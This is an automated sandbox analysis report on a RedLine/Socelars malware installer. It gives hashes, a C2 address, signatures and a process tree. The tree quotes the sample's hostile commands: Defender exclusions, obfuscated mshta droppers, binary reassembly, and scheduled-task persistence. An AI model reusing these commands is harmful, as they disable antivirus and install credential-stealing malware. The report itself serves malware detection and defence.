Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
11-10-2021 20:45
211011-zjxjlsabbm 1011-10-2021 13:10
211011-qegsxshcfp 1011-10-2021 10:55
211011-mz7y3ahaak 1010-10-2021 19:24
211010-x4mtssgae2 10Analysis
-
max time kernel
50s -
max time network
1830s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
10-10-2021 19:24
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
3.9MB
-
MD5
a4d23ac3c7172b9aa02e35b6bf0fd21f
-
SHA1
0326aab7deddfefc048c9a67ac9ce4ee14ea9003
-
SHA256
9bd142ecfe89857de80bb3255a1655f680ca6451b45cca235096dc1c1285e806
-
SHA512
9e425d8a1beaeabfc983bb75a7a5f8a8c0823e825e9f66e17b0f515b2897da9f2d9b2f1aa9939fdbae6c826c2c730d3bc772abec9e35a61d3d73a6cdb87ddf10
Malware Config
Extracted
redline
she
135.181.129.119:4805
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2824 1028 rUNdlL32.eXe 83 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral2/memory/836-200-0x0000000003160000-0x000000000317F000-memory.dmp family_redline behavioral2/memory/836-201-0x00000000033F0000-0x000000000340D000-memory.dmp family_redline -
Socelars Payload 3 IoCs
resource yara_rule behavioral2/files/0x0003000000013113-110.dat family_socelars behavioral2/files/0x0003000000013113-161.dat family_socelars behavioral2/files/0x0003000000013113-129.dat family_socelars -
resource yara_rule behavioral2/files/0x00030000000130e8-76.dat aspack_v212_v242 behavioral2/files/0x00030000000130e8-77.dat aspack_v212_v242 behavioral2/files/0x00030000000130e7-78.dat aspack_v212_v242 behavioral2/files/0x00030000000130e7-79.dat aspack_v212_v242 behavioral2/files/0x00030000000130ea-82.dat aspack_v212_v242 behavioral2/files/0x00030000000130ea-83.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 12 IoCs
pid Process 1712 setup_installer.exe 1172 setup_install.exe 1724 Sun152bab5a2de.exe 1848 Sun15dbd675f871ca.exe 1660 Sun1577c3e159a3e3815.exe 1748 Sun159ff1acacf.exe 748 Sun15901f2f025e.exe 2000 Sun15f67075f27a2b5b.exe 836 Sun15f1b1f8c669.exe 1988 Sun158d8ef840.exe 1816 Sun1507db358fce61c0b.exe 1028 wmiprvse.exe -
Loads dropped DLL 41 IoCs
pid Process 1624 setup_x86_x64_install.exe 1712 setup_installer.exe 1712 setup_installer.exe 1712 setup_installer.exe 1712 setup_installer.exe 1712 setup_installer.exe 1712 setup_installer.exe 1172 setup_install.exe 1172 setup_install.exe 1172 setup_install.exe 1172 setup_install.exe 1172 setup_install.exe 1172 setup_install.exe 1172 setup_install.exe 1172 setup_install.exe 1788 cmd.exe 1724 Sun152bab5a2de.exe 1724 Sun152bab5a2de.exe 1308 cmd.exe 1012 cmd.exe 964 cmd.exe 964 cmd.exe 824 cmd.exe 1580 cmd.exe 1580 cmd.exe 1848 Sun15dbd675f871ca.exe 1848 Sun15dbd675f871ca.exe 1660 Sun1577c3e159a3e3815.exe 1660 Sun1577c3e159a3e3815.exe 1484 cmd.exe 1484 cmd.exe 836 Sun15f1b1f8c669.exe 836 Sun15f1b1f8c669.exe 1272 cmd.exe 1676 urdrwdv 1676 urdrwdv 1784 cmd.exe 1988 Sun158d8ef840.exe 1988 Sun158d8ef840.exe 748 Sun15901f2f025e.exe 748 Sun15901f2f025e.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 44 ipinfo.io 58 ip-api.com 43 ipinfo.io -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
pid pid_target Process procid_target 3108 1848 WerFault.exe 54 1576 2428 WerFault.exe 61 3668 2988 WerFault.exe 94 -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2308 schtasks.exe 3412 schtasks.exe -
Kills process with taskkill 4 IoCs
pid Process 2628 taskkill.exe 2440 taskkill.exe 3640 taskkill.exe 2616 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 36 IoCs
description pid Process Token: SeDebugPrivilege 2000 Sun15f67075f27a2b5b.exe Token: SeDebugPrivilege 1028 wmiprvse.exe Token: SeCreateTokenPrivilege 748 Sun15901f2f025e.exe Token: SeAssignPrimaryTokenPrivilege 748 Sun15901f2f025e.exe Token: SeLockMemoryPrivilege 748 Sun15901f2f025e.exe Token: SeIncreaseQuotaPrivilege 748 Sun15901f2f025e.exe Token: SeMachineAccountPrivilege 748 Sun15901f2f025e.exe Token: SeTcbPrivilege 748 Sun15901f2f025e.exe Token: SeSecurityPrivilege 748 Sun15901f2f025e.exe Token: SeTakeOwnershipPrivilege 748 Sun15901f2f025e.exe Token: SeLoadDriverPrivilege 748 Sun15901f2f025e.exe Token: SeSystemProfilePrivilege 748 Sun15901f2f025e.exe Token: SeSystemtimePrivilege 748 Sun15901f2f025e.exe Token: SeProfSingleProcessPrivilege 748 Sun15901f2f025e.exe Token: SeIncBasePriorityPrivilege 748 Sun15901f2f025e.exe Token: SeCreatePagefilePrivilege 748 Sun15901f2f025e.exe Token: SeCreatePermanentPrivilege 748 Sun15901f2f025e.exe Token: SeBackupPrivilege 748 Sun15901f2f025e.exe Token: SeRestorePrivilege 748 Sun15901f2f025e.exe Token: SeShutdownPrivilege 748 Sun15901f2f025e.exe Token: SeDebugPrivilege 748 Sun15901f2f025e.exe Token: SeAuditPrivilege 748 Sun15901f2f025e.exe Token: SeSystemEnvironmentPrivilege 748 Sun15901f2f025e.exe Token: SeChangeNotifyPrivilege 748 Sun15901f2f025e.exe Token: SeRemoteShutdownPrivilege 748 Sun15901f2f025e.exe Token: SeUndockPrivilege 748 Sun15901f2f025e.exe Token: SeSyncAgentPrivilege 748 Sun15901f2f025e.exe Token: SeEnableDelegationPrivilege 748 Sun15901f2f025e.exe Token: SeManageVolumePrivilege 748 Sun15901f2f025e.exe Token: SeImpersonatePrivilege 748 Sun15901f2f025e.exe Token: SeCreateGlobalPrivilege 748 Sun15901f2f025e.exe Token: 31 748 Sun15901f2f025e.exe Token: 32 748 Sun15901f2f025e.exe Token: 33 748 Sun15901f2f025e.exe Token: 34 748 Sun15901f2f025e.exe Token: 35 748 Sun15901f2f025e.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1624 wrote to memory of 1712 1624 setup_x86_x64_install.exe 27 PID 1624 wrote to memory of 1712 1624 setup_x86_x64_install.exe 27 PID 1624 wrote to memory of 1712 1624 setup_x86_x64_install.exe 27 PID 1624 wrote to memory of 1712 1624 setup_x86_x64_install.exe 27 PID 1624 wrote to memory of 1712 1624 setup_x86_x64_install.exe 27 PID 1624 wrote to memory of 1712 1624 setup_x86_x64_install.exe 27 PID 1624 wrote to memory of 1712 1624 setup_x86_x64_install.exe 27 PID 1712 wrote to memory of 1172 1712 setup_installer.exe 28 PID 1712 wrote to memory of 1172 1712 setup_installer.exe 28 PID 1712 wrote to memory of 1172 1712 setup_installer.exe 28 PID 1712 wrote to memory of 1172 1712 setup_installer.exe 28 PID 1712 wrote to memory of 1172 1712 setup_installer.exe 28 PID 1712 wrote to memory of 1172 1712 setup_installer.exe 28 PID 1712 wrote to memory of 1172 1712 setup_installer.exe 28 PID 1172 wrote to memory of 1080 1172 setup_install.exe 30 PID 1172 wrote to memory of 1080 1172 setup_install.exe 30 PID 1172 wrote to memory of 1080 1172 setup_install.exe 30 PID 1172 wrote to memory of 1080 1172 setup_install.exe 30 PID 1172 wrote to memory of 1080 1172 setup_install.exe 30 PID 1172 wrote to memory of 1080 1172 setup_install.exe 30 PID 1172 wrote to memory of 1080 1172 setup_install.exe 30 PID 1172 wrote to memory of 1788 1172 setup_install.exe 31 PID 1172 wrote to memory of 1788 1172 setup_install.exe 31 PID 1172 wrote to memory of 1788 1172 setup_install.exe 31 PID 1172 wrote to memory of 1788 1172 setup_install.exe 31 PID 1172 wrote to memory of 1788 1172 setup_install.exe 31 PID 1172 wrote to memory of 1788 1172 setup_install.exe 31 PID 1172 wrote to memory of 1788 1172 setup_install.exe 31 PID 1172 wrote to memory of 1012 1172 setup_install.exe 32 PID 1172 wrote to memory of 1012 1172 setup_install.exe 32 PID 1172 wrote to memory of 1012 1172 setup_install.exe 32 PID 1172 wrote to memory of 1012 1172 setup_install.exe 32 PID 1172 wrote to memory of 1012 1172 setup_install.exe 32 PID 1172 wrote to memory of 1012 1172 setup_install.exe 32 PID 1172 wrote to memory of 1012 1172 setup_install.exe 32 PID 1172 wrote to memory of 1308 1172 setup_install.exe 33 PID 1172 wrote to memory of 1308 1172 setup_install.exe 33 PID 1172 wrote to memory of 1308 1172 setup_install.exe 33 PID 1172 wrote to memory of 1308 1172 setup_install.exe 33 PID 1172 wrote to memory of 1308 1172 setup_install.exe 33 PID 1172 wrote to memory of 1308 1172 setup_install.exe 33 PID 1172 wrote to memory of 1308 1172 setup_install.exe 33 PID 1172 wrote to memory of 824 1172 setup_install.exe 34 PID 1172 wrote to memory of 824 1172 setup_install.exe 34 PID 1172 wrote to memory of 824 1172 setup_install.exe 34 PID 1172 wrote to memory of 824 1172 setup_install.exe 34 PID 1172 wrote to memory of 824 1172 setup_install.exe 34 PID 1172 wrote to memory of 824 1172 setup_install.exe 34 PID 1172 wrote to memory of 824 1172 setup_install.exe 34 PID 1788 wrote to memory of 1724 1788 cmd.exe 38 PID 1788 wrote to memory of 1724 1788 cmd.exe 38 PID 1788 wrote to memory of 1724 1788 cmd.exe 38 PID 1788 wrote to memory of 1724 1788 cmd.exe 38 PID 1788 wrote to memory of 1724 1788 cmd.exe 38 PID 1788 wrote to memory of 1724 1788 cmd.exe 38 PID 1788 wrote to memory of 1724 1788 cmd.exe 38 PID 1080 wrote to memory of 856 1080 cmd.exe 35 PID 1080 wrote to memory of 856 1080 cmd.exe 35 PID 1080 wrote to memory of 856 1080 cmd.exe 35 PID 1080 wrote to memory of 856 1080 cmd.exe 35 PID 1080 wrote to memory of 856 1080 cmd.exe 35 PID 1080 wrote to memory of 856 1080 cmd.exe 35 PID 1080 wrote to memory of 856 1080 cmd.exe 35 PID 1172 wrote to memory of 964 1172 setup_install.exe 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Users\Admin\AppData\Local\Temp\7zS0B6A0B25\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0B6A0B25\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:856
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun152bab5a2de.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Users\Admin\AppData\Local\Temp\7zS0B6A0B25\Sun152bab5a2de.exeSun152bab5a2de.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1724
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15901f2f025e.exe4⤵
- Loads dropped DLL
PID:1012 -
C:\Users\Admin\AppData\Local\Temp\7zS0B6A0B25\Sun15901f2f025e.exeSun15901f2f025e.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:748 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:2492
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:2440
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15dbd675f871ca.exe4⤵
- Loads dropped DLL
PID:1308 -
C:\Users\Admin\AppData\Local\Temp\7zS0B6A0B25\Sun15dbd675f871ca.exeSun15dbd675f871ca.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1848 -
C:\Users\Admin\Pictures\Adobe Films\zzXg6W5UiottyPj1WKl76Tvq.exe"C:\Users\Admin\Pictures\Adobe Films\zzXg6W5UiottyPj1WKl76Tvq.exe"6⤵PID:2180
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1848 -s 15006⤵
- Program crash
PID:3108
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15f67075f27a2b5b.exe4⤵
- Loads dropped DLL
PID:824 -
C:\Users\Admin\AppData\Local\Temp\7zS0B6A0B25\Sun15f67075f27a2b5b.exeSun15f67075f27a2b5b.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2000 -
C:\Users\Admin\AppData\Roaming\1112099.scr"C:\Users\Admin\AppData\Roaming\1112099.scr" /S6⤵PID:2488
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵PID:2996
-
-
-
C:\Users\Admin\AppData\Roaming\5627207.scr"C:\Users\Admin\AppData\Roaming\5627207.scr" /S6⤵PID:2320
-
-
C:\Users\Admin\AppData\Roaming\6316964.scr"C:\Users\Admin\AppData\Roaming\6316964.scr" /S6⤵PID:2832
-
-
C:\Users\Admin\AppData\Roaming\1157046.scr"C:\Users\Admin\AppData\Roaming\1157046.scr" /S6⤵PID:2904
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1577c3e159a3e3815.exe /mixone4⤵
- Loads dropped DLL
PID:964 -
C:\Users\Admin\AppData\Local\Temp\7zS0B6A0B25\Sun1577c3e159a3e3815.exeSun1577c3e159a3e3815.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1660 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sun1577c3e159a3e3815.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0B6A0B25\Sun1577c3e159a3e3815.exe" & exit6⤵PID:2416
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sun1577c3e159a3e3815.exe" /f7⤵
- Kills process with taskkill
PID:2628
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15f1b1f8c669.exe4⤵
- Loads dropped DLL
PID:1484 -
C:\Users\Admin\AppData\Local\Temp\7zS0B6A0B25\Sun15f1b1f8c669.exeSun15f1b1f8c669.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:836
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun159ff1acacf.exe4⤵
- Loads dropped DLL
PID:1580 -
C:\Users\Admin\AppData\Local\Temp\7zS0B6A0B25\Sun159ff1acacf.exeSun159ff1acacf.exe5⤵
- Executes dropped EXE
PID:1748
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun152bea652bd7232.exe4⤵PID:888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1507db358fce61c0b.exe4⤵PID:1676
-
C:\Users\Admin\AppData\Local\Temp\7zS0B6A0B25\Sun1507db358fce61c0b.exeSun1507db358fce61c0b.exe5⤵
- Executes dropped EXE
PID:1816
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun158d8ef840.exe4⤵
- Loads dropped DLL
PID:1272 -
C:\Users\Admin\AppData\Local\Temp\7zS0B6A0B25\Sun158d8ef840.exeSun158d8ef840.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1988 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS0B6A0B25\Sun158d8ef840.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0B6A0B25\Sun158d8ef840.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )6⤵PID:1720
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS0B6A0B25\Sun158d8ef840.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0B6A0B25\Sun158d8ef840.exe") do taskkill /F -Im "%~NxU"7⤵PID:2280
-
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew8⤵PID:2456
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )9⤵PID:2736
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"10⤵PID:1144
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Sun158d8ef840.exe"8⤵
- Kills process with taskkill
PID:2616
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun152e52d07b74d9b5.exe4⤵
- Loads dropped DLL
PID:1784 -
C:\Users\Admin\AppData\Local\Temp\7zS0B6A0B25\Sun152e52d07b74d9b5.exeSun152e52d07b74d9b5.exe5⤵PID:1028
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:2196
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵PID:2256
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe"7⤵PID:2428
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2428 -s 9808⤵
- Program crash
PID:1576
-
-
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵PID:2356
-
C:\Users\Admin\AppData\Roaming\1828272.scr"C:\Users\Admin\AppData\Roaming\1828272.scr" /S8⤵PID:2364
-
-
C:\Users\Admin\AppData\Roaming\5727932.scr"C:\Users\Admin\AppData\Roaming\5727932.scr" /S8⤵PID:2304
-
-
C:\Users\Admin\AppData\Roaming\4599938.scr"C:\Users\Admin\AppData\Roaming\4599938.scr" /S8⤵PID:1780
-
C:\Users\Admin\AppData\Local\Temp\5327a7c7-1b5d-4684-b3bf-a78635542d3b\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\5327a7c7-1b5d-4684-b3bf-a78635542d3b\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\5327a7c7-1b5d-4684-b3bf-a78635542d3b\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run9⤵PID:3136
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\4599938.scr" -Force9⤵PID:4060
-
-
C:\Users\Admin\AppData\Roaming\4599938.scr"C:\Users\Admin\AppData\Roaming\4599938.scr"9⤵PID:3572
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\4599938.scr" -Force9⤵PID:3440
-
-
-
C:\Users\Admin\AppData\Roaming\1710782.scr"C:\Users\Admin\AppData\Roaming\1710782.scr" /S8⤵PID:2988
-
C:\Users\Admin\AppData\Local\Temp\696f1bfc-25a4-4463-80bb-9b549f1bd2b1\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\696f1bfc-25a4-4463-80bb-9b549f1bd2b1\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\696f1bfc-25a4-4463-80bb-9b549f1bd2b1\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run9⤵PID:3648
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1710782.scr" -Force9⤵PID:3876
-
-
C:\Users\Admin\AppData\Roaming\1710782.scr"C:\Users\Admin\AppData\Roaming\1710782.scr"9⤵PID:3916
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1710782.scr" -Force9⤵PID:3896
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 17049⤵
- Program crash
PID:3668
-
-
-
C:\Users\Admin\AppData\Roaming\3585307.scr"C:\Users\Admin\AppData\Roaming\3585307.scr" /S8⤵PID:2556
-
-
-
C:\Users\Admin\AppData\Local\Temp\sad.exe"C:\Users\Admin\AppData\Local\Temp\sad.exe"7⤵PID:2592
-
-
C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"7⤵PID:2696
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))8⤵PID:2252
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"9⤵PID:3508
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f /Im "sfx_123_206.exe"10⤵
- Kills process with taskkill
PID:3640
-
-
C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u10⤵PID:3632
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))11⤵PID:3700
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"12⤵PID:2256
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0, trUE ) )11⤵PID:1548
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6&cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G12⤵PID:2824
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"13⤵PID:3300
-
-
C:\Windows\SysWOW64\control.execontrol ..\kZ_AmsXL.6G13⤵PID:2720
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "13⤵PID:2828
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:2788
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵PID:1984
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup_2.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" & exit8⤵PID:876
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵PID:2296
-
-
C:\Users\Admin\AppData\Local\Temp\zyl-game.exe"C:\Users\Admin\AppData\Local\Temp\zyl-game.exe"7⤵PID:2388
-
-
C:\Users\Admin\AppData\Local\Temp\3.exe"C:\Users\Admin\AppData\Local\Temp\3.exe"7⤵PID:2436
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵PID:1000
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵PID:2716
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:3352
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:3412
-
-
-
